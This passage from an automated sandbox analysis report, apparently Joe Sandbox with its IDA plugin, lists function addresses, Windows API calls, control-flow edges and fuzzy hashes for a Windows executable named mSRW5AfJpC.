                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$AttributesFilewsprintf
                                                                    • String ID:
                                                                    • API String ID: 1746483863-0
                                                                    • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                    • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                                    • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                    • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1397 40cd11-40cd1e 1398 40cd24-40cd2a 1397->1398 1399 40cda5-40cda8 1397->1399 1400 40cd41-40cd52 1398->1400 1401 40cd2c 1398->1401 1403 40cd54-40cd5b 1400->1403 1404 40cd5d-40cd61 1400->1404 1402 40cd33-40cd3c _CxxThrowException 1401->1402 1402->1400 1403->1402 1405 40cd63-40cd6e ??2@YAPAXI@Z 1404->1405 1406 40cd95-40cda4 ??3@YAXPAX@Z 1404->1406 1407 40cd70-40cd77 1405->1407 1408 40cd79-40cd7e 1405->1408 1406->1399 1407->1402 1409 40cd80 1408->1409 1410 40cd82-40cd92 memcpy 1408->1410 1409->1410 1410->1406
                                                                    APIs
                                                                    • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                    • memcpy.MSVCRT(00000000,0097A1A0,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                    • ??3@YAXPAX@Z.MSVCRT(0097A1A0,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3462485524-0
                                                                    • Opcode ID: d9fd66f9b7e867562732bb3ec7a1e67f9ffff38b6fdda3ab2a622335468b0fbd
                                                                    • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                                    • Opcode Fuzzy Hash: d9fd66f9b7e867562732bb3ec7a1e67f9ffff38b6fdda3ab2a622335468b0fbd
                                                                    • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                                    APIs
                                                                      • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                                      • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                      • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                      • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$memmove
                                                                    • String ID: {D@
                                                                    • API String ID: 4294387087-1160549682
                                                                    • Opcode ID: 1b9917daedaf4263f7aa560e5a2ae6e65f798d735d95e35bc04e9499dbe68006
                                                                    • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                                    • Opcode Fuzzy Hash: 1b9917daedaf4263f7aa560e5a2ae6e65f798d735d95e35bc04e9499dbe68006
                                                                    • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                                    APIs
                                                                      • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$ExceptionThrow
                                                                    • String ID: (nA
                                                                    • API String ID: 2803161813-867891557
                                                                    • Opcode ID: 482bcfdae203e7c5ef080e28929bbf56565bdd51ccce1818c05e782574a96224
                                                                    • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                                    • Opcode Fuzzy Hash: 482bcfdae203e7c5ef080e28929bbf56565bdd51ccce1818c05e782574a96224
                                                                    • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                                    APIs
                                                                    • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                                    • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocExceptionStringThrow
                                                                    • String ID: PlA
                                                                    • API String ID: 3773818493-1533977103
                                                                    • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                    • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                                    • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                    • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                                    APIs
                                                                      • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                      • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                      • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                    • String ID:
                                                                    • API String ID: 1642057587-0
                                                                    • Opcode ID: 2edeb6870186df4899fc93cecf3c13409a52d81f25f5698bf367cb70c9bc3b0e
                                                                    • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                                    • Opcode Fuzzy Hash: 2edeb6870186df4899fc93cecf3c13409a52d81f25f5698bf367cb70c9bc3b0e
                                                                    • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002D,0000002D,?,00406616,?,00419810,00419810), ref: 00401739
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                                    • String ID: ExecuteFile
                                                                    • API String ID: 1306139538-323923146
                                                                    • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                    • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                                    • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                    • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                    • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memmove
                                                                    • String ID:
                                                                    • API String ID: 3828600508-0
                                                                    • Opcode ID: 14f79194ee43146d53f25d620fb32e5909a7870d385986c1847f37be60183fce
                                                                    • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                                    • Opcode Fuzzy Hash: 14f79194ee43146d53f25d620fb32e5909a7870d385986c1847f37be60183fce
                                                                    • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                                    APIs
                                                                      • Part of subcall function 0040CD11: _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                      • Part of subcall function 0040CD11: ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                      • Part of subcall function 0040CD11: memcpy.MSVCRT(00000000,0097A1A0,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                      • Part of subcall function 0040CD11: ??3@YAXPAX@Z.MSVCRT(0097A1A0,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 004117AE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$??2@ExceptionThrowmemcpy
                                                                    • String ID:
                                                                    • API String ID: 4187306206-3916222277
                                                                    • Opcode ID: f9194f882b2ea3db6a0ab7bd140c601fd3bb563b5c08037d8f1c8d7fcc156054
                                                                    • Instruction ID: 7b6fd5b2a41faf5e2d4800b3bc48d7f7b0be7b8839dec2c588299b9df1e5f3d5
                                                                    • Opcode Fuzzy Hash: f9194f882b2ea3db6a0ab7bd140c601fd3bb563b5c08037d8f1c8d7fcc156054
                                                                    • Instruction Fuzzy Hash: 8E613C70D00219EBCF15EFA6C5815EEBBB5BF44314B10852FE915A7391C738AAC1CBA8
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID: @
                                                                    • API String ID: 1890195054-2766056989
                                                                    • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                    • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                                    • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                    • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: lA
                                                                    • API String ID: 613200358-262130271
                                                                    • Opcode ID: 42a9dad65033d51cf8f59d802589b5647fb0ca4d13111c145937023645a98698
                                                                    • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                                    • Opcode Fuzzy Hash: 42a9dad65033d51cf8f59d802589b5647fb0ca4d13111c145937023645a98698
                                                                    • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@H_prolog
                                                                    • String ID:
                                                                    • API String ID: 1329742358-0
                                                                    • Opcode ID: 5cfeb028780a622b7539a61e3fe604e8286099a3359bcd0eb634551b058b4ad4
                                                                    • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                                    • Opcode Fuzzy Hash: 5cfeb028780a622b7539a61e3fe604e8286099a3359bcd0eb634551b058b4ad4
                                                                    • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: 3de9a2dd7c2c7b4c068155455a4e34c44bba3e714840795dfa7464e03e76c69f
                                                                    • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                                    • Opcode Fuzzy Hash: 3de9a2dd7c2c7b4c068155455a4e34c44bba3e714840795dfa7464e03e76c69f
                                                                    • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: ba9d36209897f222e9b0badb1651508dca26fbd5a7a7d6a1c9b297b28edd6115
                                                                    • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                                    • Opcode Fuzzy Hash: ba9d36209897f222e9b0badb1651508dca26fbd5a7a7d6a1c9b297b28edd6115
                                                                    • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                                    APIs
                                                                    • SetEnvironmentVariableW.KERNELBASE(?,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404630
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406260,?,00000000,0000000A), ref: 00404639
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@EnvironmentVariable
                                                                    • String ID:
                                                                    • API String ID: 3880889418-0
                                                                    • Opcode ID: eb7f12ebf992c4d216b1ba86c510b8309f717ca77dcd3ea1f37af4bb5a52afa9
                                                                    • Instruction ID: b821aa63e9602637d8feb686bb827f934507ba03fca214f0c99b91fc16a187d9
                                                                    • Opcode Fuzzy Hash: eb7f12ebf992c4d216b1ba86c510b8309f717ca77dcd3ea1f37af4bb5a52afa9
                                                                    • Instruction Fuzzy Hash: BDF05836900118AFCB01AF98EC458CE77B8EB48704B41807AE922A72A1DB34AD418B8D
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                    • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                    • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                    • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
